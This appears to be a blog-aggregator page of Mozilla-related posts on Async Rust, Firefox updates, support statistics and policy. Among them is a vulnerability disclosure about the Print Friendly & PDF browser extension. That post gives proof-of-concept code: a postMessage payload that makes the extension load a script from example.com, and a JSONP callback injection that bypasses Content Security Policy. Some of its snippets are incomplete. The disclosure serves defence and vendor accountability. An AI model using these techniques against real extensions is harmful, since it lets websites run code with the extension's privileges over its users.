Now, we can clearly see that while 45% of clean patches have 100% coverage, only around 25% of buggy patches have 100% coverage. The proportion of patches that is between 100% and 80% coverage is similar, but non-buggy patches more often present higher coverage than buggy ones. There are no meaningful differences for 40% of the patches (from 0.6 to 1.0 in the chart above).

What I learned

To summarize, we can see that there is a correlation between coverage and bug proneness. In particular, fully covered patches more rarely cause post-release bugs. Of course, correlation does not mean causation. We can’t tell for sure that writing tests for new code changes will reduce the riskiness of those changes, but we can definitely say that we can increase our attention level when changes are not covered by tests.

The Rust Programming Language BlogBrainstorming Async Rust's Shiny Future

On March 18th, we announced the start of the Async Vision Doc process. Since then, we've landed 24 "status quo" stories and we have 4 more stories in open PRs; Ryan Levick and I have also hosted more than ten collaborative writing sessions over the course of the last few weeks, and we have more scheduled for this week.

Now that we have a good base of "status quo" stories, we are starting to imagine what the ✨ "shiny future" ✨ might look like. We want your help! If you have a great idea for Async Rust1, then take a look at the template and open a PR! Alternatively, if you have an idea for a story but would like to discuss it before writing, you can open a "shiny future" issue. Also, we would still love to get more "status quo" stories, so please continue to share those.

When writing "shiny future" stories, the goal is to focus on the experience of Rust's users first and foremost, and not so much on the specific technical details. In fact, you don't even have to know exactly how the experience will be achieved. We have a few years to figure that out, after all. 🚀

Every "shiny future" story is a "retelling" of one or more "status quo" stories. The idea is to replay the same scenario but hopefully with a happier ending, as a result of the improvements we've made. If you don't see a "status quo" story that is right for telling your "shiny future" story, though, that's no problem! Write up your story and we'll figure out the "status quo" story it addresses. There is always the option of writing a new "status quo" story, too; we are still requesting "status quo" and "shiny future" stories, and we will do so right up until the end.

If you'd like to see what a "shiny future" story looks like, we have merged one example, Barbara Makes a Wish. This story describes Barbara's experiences using a nifty new tool that gives her lots of information about the state of her async executor. It is a "retelling" of the "status quo" story Barbara Wants Async Insights.

What is the async vision doc and how does it work?

Here is the idea in a nutshell:

We are launching a collaborative effort to build a shared vision document for Async Rust. Our goal is to engage the entire community in a collective act of the imagination: how can we make the end-to-end experience of using Async I/O not only a pragmatic choice, but a joyful one?

As described in the original announcement, the vision document is structured as a series of "status quo" and "shiny future" stories. Each story describes the experiences of one or more of our four characters as they go about achieving their goals using Async Rust.

The "status quo" stories describe the experiences that users have today. They are an amalgamation of the real experiences of people using Async Rust, as reported to us by interviews, blog posts, and tweets. The goal with these stories is to help us understand and gauge the cumulative impact that problems can have on our users.

The "shiny future" stories describe those some characters achieving those same goals, but looking forward a few years into the future. They are meant to illustrate the experience we are aiming towards, and to give the overall context for the RFCs and other kinds of changes we want to pursue.

The brainstorming period and what comes next

We are currently in the midst of the brainstorming period. This means that we are seeking to collect as many stories -- both about the "status quo" and the "shiny future" -- as we can. The brainstorming period lasts until the end of April. After that, the working group leads are going to merge the remaining stories and get to work drafting a synthesized vision document that incorporates elements of the various stories that have been submitted.

Going forward, we plan to revisit the vision document regularly. We fully expect that some aspects of the "shiny future" stories we write are going to be wrong, sometimes very wrong. We will be regularly returning to the vision document to check how things are going and adjust our trajectory appropriately.

This sounds cool, how can I get involved?

If you'd like to help, we'd love to have you! If you've got an idea for a story, then feel free to create a PR to the wg-async-foundations repository based on one of the following templates:

If you'd like a bit more inspiration, then you can join Ryan Levick and I at one of our vision doc writing sessions. We have more sessions scheduled this week and you can look for announcements from us on twitter or check the #wg-async-foundations stream on the rust-lang Zulip.

  1. Don't be modest. You know you do.

Andrew HalberstadtPhabricator Etiquette Part 1: The Reviewer

In the next two posts we will examine the etiquette of using Phabricator. This post will examine tips from the reviewer’s perspective, and next week will focus on the author’s point of view. While the social aspects of etiquette are incredibly important, we should all be polite and considerate, these posts will focus more on the mechanics of using Phabricator. In other words, how to make the review process as smooth as possible without wasting anyone’s time.

Let’s dig in!

Wladimir PalantPrint Friendly & PDF: Full compromise

I looked into the Print Friendly & PDF browser extension while helping someone figure out an issue they were having. The issue turned out unrelated to the extension, but I already noticed something that looked very odd. A quick investigation later I could confirm a massive vulnerability affecting all of its users (close to 1 million of them). Any website could easily gain complete control of the extension.

Print Friendly & PDF in Chrome Web Store: 800,000+ users

This particular issue has been resolved in Print Friendly & PDF 2.7.39 for Chrome. The underlying issues have not been addressed however, and the extension is still riddled with insecure coding practices. Hence my recommendation is still to uninstall it. Also, the Firefox variant of the extension (version 1.3) is still affected. I did not look at the Microsoft Edge variant but it hasn’t been updated recently and might also be vulnerable.

Note: To make the confusion complete, there is a browser extension called Print Friendly & PDF 2.1.0 on the Firefox Add-ons website. This one has no functionality beyond redirecting the user to printfriendly.com and isn’t affected. The problematic Firefox extension is being distributed from the vendor’s website directly.

Summary of the findings

As of version 2.7.33 for Chrome and 1.3 for Firefox, Print Friendly & PDF marked two pages (algo.html and core.html) as web-accessible, meaning that any web page could load them. The initialization routine for these pages involved receiving a message event, something that a website could easily send as well. Part of the message data were scripts that would then be loaded in extension context. While normally Content Security Policy would prevent exploitation of this Cross-Site Scripting vulnerability, here this protection was relaxed to the point of being easily circumvented. So any web page could execute arbitrary JavaScript code in the context of the extension, gaining any privileges that the extension had.

The only factor slightly alleviating this vulnerability was the fact that the extension did not request too many privileges:

"permissions": [ "activeTab", "contextMenus" ],

So any code running in the extension context could “merely”:

  • Persist until a browser restart, even if the website it originated from is closed
  • Open new tabs and browser windows at any time
  • Watch the user opening and closing tabs as well as navigating to pages, but without access to page addresses or titles
  • Arbitrarily manipulate the extension’s icon and context menu item
  • Gain full access to the current browser tab whenever this icon or context menu item was clicked

Insecure communication

When the Print Friendly & PDF extension icon is clicked, the extension first injects a content script into the current tab. This content script then adds a frame pointing to the extension’s core.html page. This requires core.html to be web-accessible, so any website can load that page as well (here assuming Chrome browser):

<iframe src="chrome-extension://ohlencieiipommannpdfcmfdpjjmeolj/core.html"></iframe>

Next the content script needs the frame to initialize. And so it takes a shortcut by using window.postMessage and sending a message to the frame. While being convenient, this API is also rarely used securely in a browser extension (see Chromium issue I filed). Here is what the receiving end looks like in this case:

window.addEventListener('message', function(event) {
  if (event.data) {
    if (event.data.type === 'PfLoadCore' && !pfLoadCoreCalled) {
      pfLoadCoreCalled = true;
      var payload = event.data.payload;
      var pfData = payload.pfData;
      var urls = pfData.config.urls;

      helper.loadScript(urls.js.core, function() {
        window.postMessage({type: 'PfStartCore', payload: payload}, '*');
      helper.loadCss(urls.css.pfApp, 'screen');

No checks performed here, any website can send a message like that. And helper.loadScript() does exactly what you would expect: it adds a <script> tag to the current (privileged) extension script and attempts to load whatever script it was given.

So any web page that loaded this frame can do the following:

var url = "https://example.com/xss.js";
  type: "PfLoadCore",
  payload: {
    pfData: {
      config: {
        urls: {
          js: {
            jquery: url
}, "*")

And the page will attempt to load this script, in the extension context.

Getting around Content Security Policy

With most web pages, this would be the point where attackers could run arbitrary JavaScript code. Browser extensions are always protected by Content Security Policy however. The default strict-src 'self' policy makes exploiting Cross-Site Scripting vulnerabilities difficult (but not impossible).

But Print Friendly & PDF does not stick to the default policy. Instead, what they have is the following:

"content_security_policy": "script-src 'self'

Yes, that’s a very long list of web servers that JavaScript code can come from. In particular, the CDN servers host all kinds of JavaScript libraries. But one doesn’t really have to go there. Elsewhere in the extension code one can see:

var script = document.createElement("script");
script.src = this.config.hosts.ds_cdn +
    "/api/v3/domain_settings/a?callback=pfMod.saveAdSettings&hostname=" +
    this.config.hosts.page + "&client_version=" + hokil.version;

See that callback parameter? That’s JSONP, the crutch web developers used for cross-domain data retrieval before Cross-Origin Resource Sharing was widely available. It’s essentially Cross-Site Scripting but intentionally. And the callback parameter becomes part of the script.

Nowadays JSONP endpoints which are kept around for legacy reasons will usually only allow certain characters in the callback name. Not so in this case. Loading https://www.printfriendly.com/api/v3/domain_settings/a?callback=alert(location.href)//&hostname=example.com will result in the following script:


So here we can inject any code into a script that is located on the www.printfriendly.com domain. If we ask the extension to load this one, Content Security Policy will no longer prevent it. Done, injection of arbitrary code into the extension context, full compromise.

What’s fixed and what isn’t

More than two months after reporting this issue I checked in on the progress. I discovered that, despite several releases, the current extension version was still vulnerable. So I sent a reminder to the vendor, warning them about the disclosure deadline getting close. The response was reassuring:

We are working on it. […] We will be finishing the update before the deadline.

When I finally looked at the fix before this publication, I noticed that it merely removed the problematic message exchange. The communication now went via the extension’s background page as it should. That’s it.

While this prevents exploitation of the issue as outlined here, all other problematic choices remain intact. In particular, the extension continues to relax Content Security Policy protection. Given how this extension works, my recommendation was hosting the core.html frame completely remotely. This has not been implemented.

No callback name validation has been added to the JSONP endpoints on www.printfriendly.com (there are multiple), so Content Security Policy integrity hasn’t been ensured this way either.

Not just that, the extension continues to use JSONP for some functionality, even in privileged contexts. The JavaScript code executed here comes not merely from www.printfriendly.com but also from api.twitter.com for example. For reference: there is absolutely no valid reason for a browser extension to use JSONP.

And while the insecure message exchange has been removed, some of the extension’s interactions with web pages remain highly problematic.


  • 2021-01-13: Reported the vulnerability to the vendor
  • 2021-01-13: Received confirmation that the issue is being looked at
  • 2021-03-21: Reminded the vendor of the disclosure deadline
  • 2021-03-22: Received confirmation that the issue will be fixed in time
  • 2021-04-07: Received notification about the issue being resolved
  • 2021-04-12: Notified the vendor about outstanding problems and lack of a Firefox release

Daniel Stenbergtalking curl on changelog again

We have almost a tradition now, me and the duo Jerod and Adam of the Changelog podcast. We talk curl and related stuff every three years. Back in 2015 we started out in episode 153 and we did the second one in episode 299 in 2018.

Time flies and now we’re in 2021 and we did again “meet up” virtually and talked curl and related stuff for a while. curl is now 23 years old and I still run the project, a few things have changed since the last curl episode and I asked my twitter friends for what they wanted to know and I think we managed to get a whole bunch of such topics into the mix.

So, here’s the 2021 edition of Daniel on the Changelog podcast: episode 436.

The Changelog 436: Curl is a full-time job (and turns 23) – Listen on Changelog.com

Anyone want to bet if we’ll do it again in 2024?

Firefox NightlyThese Weeks in Firefox: Issue 91


  • Starting from Firefox 89, we now support dynamic imports in extension content scripts. Thanks to evilpie for working on fixing this long standing enhancement request!
    • NOTE: the docs have not been updated yet, refer to the new test cases landed as part of Bug 1536094 to get an idea of how to use it in extension content scripts.
  • Entering a term like “seti@home” or “folding@home” in the URL bar should now search by default, rather than treating it like a URL (Bug 1693503)

Friends of the Firefox team

For contributions made from March 23, 2021 to April 6, 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Anshul Sahai
  • Claudia Batista [:claubatista]
  • Falguni Islam
  • Itiel
  • Kajal Sah
  • Michelle Goossens
  • Tim Nguyen :ntim

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Changes to devtools API internals related to the ongoing DevTools Fission work (Bug 1699493). Thanks to Alex Poirot for taking care of the extension APIs side of this fission-related refactoring.
  • Allowed sandboxed extension sub frames to load their own resources (Bug 1700762)
  • Fixed a non critical regression related to the error message for a browser.runtime.sendMessage call to the extension id for an extension that isn’t installed (Bug 1643176):
    • NOTE: non-critical because the regression was hiding the expected error message behind a generic “An unexpected error occurred” message, but under conditions that were already expected to return a rejected promise
  • Small fission-related fix related to a errors logged while navigating to a url loaded in different process a content process iframe attached by a content script (Bug 1697774)
    • NOTE: the issue wasn’t actually introducing any breakage, but that is an expected scenario in fission and it should be handled gracefully to avoid spamming the logs
WebExtension APIs
  • webNavigation API: part of the webNavigation API internals have been rewritten in C++ as part of the Fission related changes to the WebExtensions framework (Bug 1581859). Thanks to Kris Maglione for his work on this fission-related refactoring
    • NOTE: let us know if you do notice regressions in behavior that may be related to the webNavigation API (e.g. D110173, attached to Bug 1594921, it has been fixed a regression related to webNavigation events related to the the initial about:blank document emitted more often than the previous “frame scripts”-based implementation)
  • tabs API: Fixed a bug that was turning hidden tab’s URLs into “about:blank” when an hidden tab is moved between windows while an extension has registered a tabs.onUpdated listener that uses a url-based events filter (Bug 1695346).
Addon Manager & about:addons
  • Fixed regression related to the about:addons extensions options page modals (Bug 1702059)
    • NOTE: In Firefox 89 WebExtensions options_ui pages will keep using the previous tab modal implementation, which is helpful in the short run to allow our Photon tab prompts restyling to ride the train as is, in a followup we will have to do some more work to look into porting these modals to the new implementation
  • Bug 1689240: Last bits of a set of simplifications and internal refactoring for the about:addons page initially contributed by ntim (plus some more tweaks we did to finalize and land it). Thanks to ntim for getting this started!

Installer & Updater

Messaging System

  • Launched “1-Click Pin During Onboarding” experiment to 100% of new 87 Windows 1903+ users via Nimbus Preview -> Live (avoiding a copy/paste error from stage)

Password Manager


  • Doug Thayer fixed a bug where skeleton UI was breaking scroll inertia on Windows.
  • Emma Malysz is continuing work on OS.File bugs.
  • Florian Quèze is fixing tests and cleaning up old code.

Performance Tools

  • Enabled the new profiler recording panel in dev edition (thanks nicolas from devtools team).
  • Added Android device information inside the profile data and started to show it in the profile meta panel.
  • Fixed the network markers with service workers. Previously it was common to use “unfinished” markers. More fixes are coming.
  • Removed many MOZ_GECKO_PROFILER ifdefs. Less places to potentially break on Tier-3 platform builds.
  • You can now import Android trace format to Firefox Profiler analysis UI. Just drag and drop the .trace file into firefox.profiler.com, it will import and open it automatically.
  • Added new markers:
    • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • “CSS animation”
    • “CSS transition”

Search and Navigation

  • Fixed flickering of some specific results in the Address Bar – Bug 1699211, Bug 1699227
  • New tab search field hand-off to the Address Bar now uses the default Address Bar empty search mode instead of entering Search Mode for the default engine – Bug 1616700
  • The Search Service now exposes an “isGeneralPurposeEngine” property on search engines, that identifies engines searching the Web, rather than specific resources or products. This may be extended in the future to provide some kind of categorization of engines. – Bug 1697477
  • Re-enabling a WebExtension engine should re-prompt the user if it wants to be set as default search engine – Bug 1646338


The Mozilla BlogMozilla partners with NVIDIA to democratize and diversify voice technology

As technology makes massive shift to voice-enabled products, NVIDIA invests $1.5 million in Mozilla Common Voice to transform the voice recognition landscape 

Over the next decade, speech is expected to become the primary way people interact with devices — from laptops and phones to digital assistants and retail kiosks. Today’s voice-enabled devices, however, are inaccessible to much of humanity because they cannot understand vast swaths of the world’s languages, accents, and speech patterns.

To help ensure that people everywhere benefit from this massive technological shift, Mozilla is partnering with NVIDIA, which is investing $1.5 million in Mozilla Common Voice, an ambitious, open-source initiative aimed at democratizing and diversifying voice technology development.

Most of the voice data currently used to train machine learning algorithms is held by a handful of major companies. This poses challenges for others seeking to develop high-quality speech recognition technologies, while also exacerbating the voice recognition divide between English speakers and the rest of the world.

Launched in 2017, Common Voice aims to level the playing field while mitigating AI bias. It enables anyone to donate their voices to a free, publicly available database that startups, researchers, and developers can use to train voice-enabled apps, products, and services. Today, it represents the world’s largest multi-language public domain voice data set, with more than 9,000 hours of voice data in 60 different languages, including widely spoken languages and less used ones like Welsh and Kinyarwanda, which is spoken in Rwanda. More than 164,000 people worldwide have contributed to the project thus far.

This investment will accelerate the growth of Common Voice’s data set, engage more communities and volunteers in the project, and support the hiring of new staff.

To support the expansion, Common Voice will now operate under the umbrella of the Mozilla Foundation as part of its initiatives focused on making artificial intelligence more trustworthy. According to the Foundation’s Executive Director, Mark Surman, Common Voice is poised to pioneer data donation as an effective tool the public can use to shape the future of technology for the better.

“Language is a powerful part of who we are, and people, not profit-making companies, are the right guardians of how language appears in our digital lives,” said Surman. “By making it easy to donate voice data, Common Voice empowers people to play a direct role in creating technology that helps rather than harms humanity. Mozilla and NVIDIA both see voice as a prime opportunity where people can take back control of technology and unlock its full potential.”

“The demand for conversational AI is growing, with chatbots and virtual assistants impacting nearly every industry,” said Kari Briski, senior director of accelerated computing product management at NVIDIA. “With Common Voice’s large and open datasets, we’re able to develop pre-trained models and offer them back to the community for free. Together, we’re working toward a shared goal of supporting and building communities — particularly for under-resourced and under-served languages.”

The post Mozilla partners with NVIDIA to democratize and diversify voice technology appeared first on The Mozilla Blog.

Niko MatsakisAsync Vision Doc Writing Sessions V

This is an exciting week for the vision doc! As of this week, we are starting to draft “shiny future” stories, and we would like your help! (We are also still working on status quo stories, so there is no need to stop working on those.) There will be a blog post coming out on the main Rust blog soon with all the details, but you can go to the “How to vision: Shiny future” page now.

This week, Ryan Levick and I are going to be hosting four Async Vision Doc Writing Sessions. Here is the schedule:

When Who Topic
Wed at 07:00 ET Ryan TBD
Wed at 15:00 ET Niko Shiny future – Niklaus simulates hydrodynamics
Fri at 07:00 ET Ryan TBD
Fri at 14:00 ET Niko Shiny future – Portability across runtimes

The idea for shiny future is to start by looking at the existing stories we have and to imagine how they might go differently. To be quite honest, I am not entirely how this is going to work, but we’ll figure it out together. It’s going to be fun. =) Come join!

Support.Mozilla.OrgWhat’s up with SUMO – Q1 2021

Hey SUMO folks,

Starting from this month, we’d like to reenact our old tradition to have the summary of what’s happening in our SUMO nation. But instead of weekly like the old days, we’re going to have a monthly updates. This post will be an exception though, as we’d like to recap the entire Q1 of 2021.

So, let’s get to it!

Welcome on board!

  1. Welcome to bingchuanjuzi (rebug). Thank you for your contribution to 62 zh-CN articles despite just getting started in Oct 2020.
  2. Hello and welcome Vinay to the Gujarati localization group. Thanks for picking up the work in a locale that has been inactive for awhile.
  3. Welcome back to JCPlus. Thank you for stewarding the Norsk (No) locale.
  4. Welcome brisu and Manu! Thank you for helping us with Firefox for iOS questions.
  5. Welcome to Kaio Duarte to the Social Support program!
  6. Devin and Matt C for their comeback to Social Support program (Devin has helped us with Buffer Reply and Matt was part of Army of Awesome program in the past).

Last but not least, let’s join us to welcome to Fabi and Daryl to the SUMO team. Fabi is the new Technical Writer (although, I should note that she will be helping us with Spanish localization as well) and Daryl is joining us as a Senior User Experience Designer. Welcome both!

Community news

  • Play Store Support is transitioning to Conversocial. Please read the full announcement in our blog if you haven’t.
  • Are you following news about Firefox? If yes is your answer, then I have good news for you. You can now subscribe to Firefox Daily Digest to get updates about what people are talking about Firefox and other Mozilla products on social media like Reddit and Twitter.
  • Another good news from the Twitter-land. Finally, we regain our access to @SUMO_mozilla Twitter account (if you want to learn the backstory, go watch our community call in March). Also, go follow the account if you haven’t because we’re going to use it to share more community updates moving forward.
  • Check out the following release notes from Kitsune in the past quarter:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February, and March.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats


KB Page views

Month Page views Vs previous month
January 2020 12,860,141 +3.72%
February 2020 11,749,283 -9.16%
March 2020 12,143,366 +3.2%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Marchelo Ghelman
  4. Artist
  5. Underpass

KB Localization

Top 10 locale based on total page views

Locale Jan 2020 Feb 2020 Mar 2020 Localization progress (per 6 Apr)
de 11.69% 11.3% 10.4% 98%
fr 7.33% 7.23% 6.82% 90%
es 5.98% 6.48% 6.4% 47%
zh-CN 4.7% 4.14% 5.94% 97%
ru 4.56% 4.82% 4.41% 99%
pt-BR 4.56% 5.41% 5.8% 72%
ja 3.64% 3.61% 3.68% 57%
pl 2.56% 2.54% 2.44% 83%
it 2.5% 2.44% 2.45% 95%
nl 1.03% 0.99% 0.98% 98%

Top 5 localization contributor in the last 90 days: 

  1. Ihor_ck
  2. Artist
  3. Markh2
  4. JimSp472
  5. Goudron

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jan 2020 3936 68.50% 15.52% 70.21%
Feb 2020 3582 65.33% 14.38% 77.50%
Mar 2020 3639 66.34% 14.70% 81.82%

Top 5 forum contributor in the last 90 days: 

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Sfhowes
  5. Seburo

Social Support

Channel Jan 2020 Feb 2020 Mar 2020
Total conv Conv handled Total conv Conv handled Total conv Conv handled
@firefox 3,675 668 3,403 136 2,998 496
@FirefoxSupport 274 239 188 55 290 206

Top 5 contributors in Q1 2021

  1. Md Monirul Alom
  2. Andrew Truong
  3. Matt C
  4. Devin E
  5. Christophe Villeneuve

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

  • What’s new in Firefox for Android
  • Additional messaging to set Firefox as a default app were added in Firefox for iOS 32.
  • There’s also additional widget for iOS as well as improvement on bookmarking that were introduced in V32.

Other products / Experiments

  • VPN MacOS and Linux Release.
  • VPN Feature Updates Release.
  • Firefox Accounts Settings Updates.
  • Mozilla ION → Rally name change
  • Add-ons project – restoring search engine defaults.
  • Sunset of Amazon Fire TV.


If you know anyone that we should feature here, please contact Kiki and we’ll make sure to   add them in our next edition.

Useful links:

The Mozilla BlogReflections on One Year as the CEO of Mozilla

If we want the internet to be different we can’t keep following the same roadmap.

I am celebrating a one-year anniversary at Mozilla this week, which is funny in a way, since I have been part of Mozilla since before it had a name. Mozilla is in my DNA–and some of my DNA is in Mozilla. Twenty-two years ago I wrote the open-source software licenses that still enable our vision, and throughout my years here I’ve worn many hats. But one year ago I became CEO for the second time, and I have to say up front that being CEO this time around is the hardest role I’ve held here. And perhaps the most rewarding.

On this anniversary, I want to open up about what it means to be the CEO of a mission-driven organization in 2021, with all the complications and potential that this era of the internet brings with it. Those of you who know me, know I am generally a private person. However, in a time of rapid change and tumult for our industry and the world, it feels right to share some of what this year has taught me.

Six lessons from my first year as CEO:

1 AS CEO I STRADDLE TWO WORLDS: There has always been a tension at Mozilla, between creating products that reflect our values as completely as we can imagine, and products that fit consumers’ needs and what is possible in the current environment. At Mozilla, we feel the push and pull of competing in the market, while always seeking results from a mission perspective. As CEO, I find myself embodying this central tension.

It’s a tension that excites and energizes me. As co-founder and Chair, and Chief Lizard Wrangler of the Mozilla project before that, I have been the flag-bearer for Mozilla’s value system for many years. I see this as a role that extends beyond Mozilla’s employees. The CEO is responsible for all the employees, volunteers, products and launches and success of the company, while also being responsible for living up to the values that are at Mozilla’s core. Now, I once again wear both of these hats.

I have leaned on the open-source playbook to help me fulfill both of these obligations, attempting to wear one hat at a time, sometimes taking one off and donning the other in the middle of the same meeting. But I also find I am becoming more adept at seamlessly switching between the two, and I find that I can be intensely product oriented, while maintaining our mission as my true north.

2 MOZILLA’S MISSION IS UNCHANGED BUT HOW WE GET THERE MUST: This extremely abnormal year, filled with violence, illness ,and struggle, has also confirmed something I already knew: that even amid so much flux, the DNA of Mozilla has not changed since we first formed the foundation out of the Netscape offices so many years ago. Yes, we expanded our mission statement once to be more explicit about the human experience as a more complete statement of our values.

What has changed is the world around us. And — to stick with the DNA metaphor for a second here — that has changed the epigenetics of Mozilla. In other words, it has changed the way our DNA is expressed.

3 CHANGE REQUIRES FOLLOWING A NEW PATH: We want the internet to be different. We feel an urgency to create a new and better infrastructure for the digital world, to help people get the value of data in a privacy-forward way, and to connect entrepreneurs who also want a better internet.

By definition, if you’re trying to end up in a different place, you can’t keep following the same path. This is my working philosophy. Let me tell a quick story to illustrate what I mean.

Lately we’ve been thinking a lot about data, and what it means to be a privacy-focused company that brings the benefits of data to our users. This balancing act between privacy and convenience is, of course, not a new problem, but as I was thinking about the current ways it manifests, I was reminded of the early days of Firefox.

When we first launched Firefox, we took the view that data was bad — even performance metrics about Firefox that could help us understand how Firefox performs outside of our own test environments, we viewed as private data we didn’t want. Well, you see where this is going, don’t you? We quickly learned that without such data (which we call telemetry), we couldn’t make a well functioning browser. We needed information about when or why a site crashed, how long load times were, etc. And so we took one huge step with launching Firefox, and then we had to take a step sideways, to add in the sufficient — but no more than that! — data that would allow the product to be what users wanted.

In this story you can see how we approach the dual goals of Mozilla: to be true to our values, and to create products that enable people to have a healthier experience on the internet. We find ourselves taking a step sideways to reach a new path to meet the needs of our values, our community and our product.

4 THE SUM OF OUR PARTS: Mozilla’s superpower is that our mission and our structure allow us to benefit from the aggregate strength that’s created by all our employees and volunteers and friends and users and supporters and customers.

We are more than the sum of our parts. This is my worldview, and one of the cornerstones of open-source philosophy. As CEO, one of my goals is to find new ways for Mozilla to connect with people who want to build a better internet. I know there are many people out there who share this vision, and a key goal of the coming era is finding ways to join or help communities that are also working toward a better internet.

5 BRING ME AMBITIOUS IDEAS: I am always looking for good ideas, for big ideas, and I have found that as CEO, more people are willing to come to me with their huge ambitions. I relish it. These ideas don’t always come from employees, though many do. They also come from volunteers, from people outside the company entirely, from academics, friends, all sorts of people. They honor me and Mozilla by sharing these visions, and it’s important to me to keep that dialogue open.

I am learning that it can be jarring to have your CEO randomly stop by your desk for a chat — or in remote working land, to Slack someone unexpectedly — so there need to be boundaries in place, but having a group of people who I can trust to be real with me, to think creatively with me, is essential.

The pandemic has made this part of my year harder, since it has removed the serendipity of conversations in the break room or even chance encounters at conferences that sometimes lead to the next great adventure. But Mozilla has been better poised than most businesses to have an entirely remote year, given that our workforce was already between 40 and 50 percent distributed to begin with.

6 WE SEEK TO BE AN EXAMPLE: One organization can’t change everything. At Mozilla, we dream of an internet and software ecosystem that is diverse and distributed, that uplifts and connects and enables visions for all, not just those companies or people with bottomless bank accounts. We can’t bring about this change single handedly, but we can try to change ourselves where we think we need improvement, and we can stand as an example of a different way to do things. That has always been what we wanted to do, and it remains one of our highest goals.

Above all, this year has reinforced for me that sometimes a deeply held mission requires massive wrenching change in order to be realized. I said last year that Mozilla was entering a new era that would require shifts. Our growing ambition for mission impact brings the will to make these changes, which are well underway. From the earliest days of our organization, people have been drawn to us because Mozilla captures an aspiration for something better and the drive to actually make that something happen. I cannot overstate how inspiring it is to see the dedication of the Mozilla community. I see it in our employees, I see it in our builders, I see it in our board members and our volunteers. I see it in all those who think of Mozilla and support our efforts to be more effective and have more impact. I wouldn’t be here without it. It’s the honor of my life to be in the thick of it with the Mozilla community.

– Mitchell

The post Reflections on One Year as the CEO of Mozilla appeared first on The Mozilla Blog.

Mozilla Privacy BlogMozilla weighs in on political advertising for Commission consultation

Later this year, the European Commission is set to propose new rules to govern political advertising. This is an important step towards increasing the resilience of European democracies, and to respond to the changes wrought by digital campaigning. As the Commission’s public consultation on the matter has come to a close, Mozilla stresses the important role of a healthy internet and reiterates its calls for systemic online advertising transparency globally. 

In recent years political campaigns have increasingly shifted to the digital realm – even more so during the pandemic. This allows campaigners to engage different constituencies in novel ways and enables them to campaign at all when canvassing in the streets is impossible due to public health reasons. However, it has also given rise to new risks. For instance, online political advertising can serve as an important and hidden vector for disinformation, defamation, voter suppression, and evading pushback from political opponents or fact checkers. The ways in which platforms’ design and practices facilitate this and the lack of transparency in this regard have therefore become subject to ever greater scrutiny. This reached a high point around the U.S. presidential elections last year, but it is important to continue to pay close attention to the issue as other countries go to the polls for major elections – in Europe and beyond.

At Mozilla, we have been working to hold platforms more accountable, particularly with regard to advertising transparency and disinformation (see, for example, here, here, here, and here). Pushing for wide-ranging transparency is critical in this context: it enables communities to uncover and protect from harms that platforms alone cannot or fail to avert. We therefore welcome the Commission’s initiative to develop new rules to this end, which Member States can expand upon depending on the country-specific context. The EU Code of Practice on Disinformation, launched in 2019 and which Mozilla is a signatory of, was a first step in the right direction to improve the scrutiny of and transparency around online advertisements. In recent years, large online platforms have made significant improvements in this regard – but they still fall short in various ways. This is why we continue to advocate the mandatory disclosure of all online advertisements, as reflected in our recommendations for the Digital Services Act (DSA) and the European Democracy Action Plan.

As the Commission prepares its proposal, we recommend lawmakers in the EU and elsewhere to consider the following measures that we believe can enhance transparency and accountability with respect to online political advertising, and ultimately increase the resilience of democracies everywhere:

  • Develop a clear definition of political advertising: Defining political advertising is a complicated exercise, forcing regulators to draw sharp lines over fuzzy boundaries. Nonetheless, in order to ensure heightened oversight, we need a functional definition of what does and does not constitute political advertising. In coming up with a definition, regulators should engage with experts from civil society, academia, and industry and draw inspiration from “offline” definitions of political advertising.
  • Address novel forms of political advertising online: When defining political advertising, regulators should also include political content that users are paid (i.e. paid influencer content) by political actors to create and promote. Platforms should provide self-disclosure mechanisms for users to indicate these partnerships when they upload content (as Instagram and YouTube have done). This self-disclosed political advertising should be labeled as such to end-users and be included in the ad archives maintained by platforms.
  • Ramp up disclosure obligations for ‘political’ advertising: As part of its proposal for the DSA, the Commission already foresees a mandate for large platforms to publicly disclose all advertisements through ad archive APIs in order to facilitate increased scrutiny and study of online advertising. These disclosure obligations closely resemble those previously advocated by Mozilla. Importantly, this would apply to all advertising so as to prevent under-disclosure should some relevant advertisements elude an eventual definition of political advertising. With this baseline, enhanced disclosure obligations should be required for advertisements that are considered political given their special role in and potentially harmful effects on the democratic process and public discourse. Amongst others, Stiftung Neue Verantwortung, the European Partnership for Democracy, and ourselves have offered ideas on the specifics of such an augmented disclosure regime. For example, this should include more fine-grained information on targeting parameters and methods used by advertisers, audience engagement, ad spend, and other versions of the ad in question that were used for a/b testing.
  • Enhance user-facing transparency: Information on political advertising should not only be available via ad archive APIs, but also directly to users as they encounter an advertisement. Such ads should be labeled in a way that clearly distinguishes them from organic content. Additional information, for example on the sponsor or on why a person was targeted, should be presented in an intelligible manner and either be included in the label or easily accessible from the specific content display. Further, platforms could be obliged to allow third parties to build tools providing users with new insights about, for instance, how and by whom they are being targeted.

Finally, we recommend the Commission to explore the following approaches should it seek to put limits on microtargeting of political advertisements in its upcoming proposal:

  • Restrict targeting parameters: Parameters for micro-targeting of political advertising could exclude sensitive, behavioral, and inferred information as well as information from external datasets uploaded by advertisers, as others have argued. In line with Mozilla’s commitment to Lean Data Practices, this would discourage large-scale data collection by political advertisers and level the playing field for those who lack large amounts of data – so that political campaigns remain competitions of ideas, not of who collects the most data.

While online political advertising and our understanding of the accompanying challenges will continue to evolve, the recommended measures would help make great strides towards protecting the integrity of elections and civic discourse. We look forward to working with lawmakers and the policy community to advance this shared objective and ensure that the EU’s new rules will hit the mark.

The post Mozilla weighs in on political advertising for Commission consultation appeared first on Open Policy & Advocacy.

The Firefox FrontierYou’ve been scraped, the Facebook data leak explained

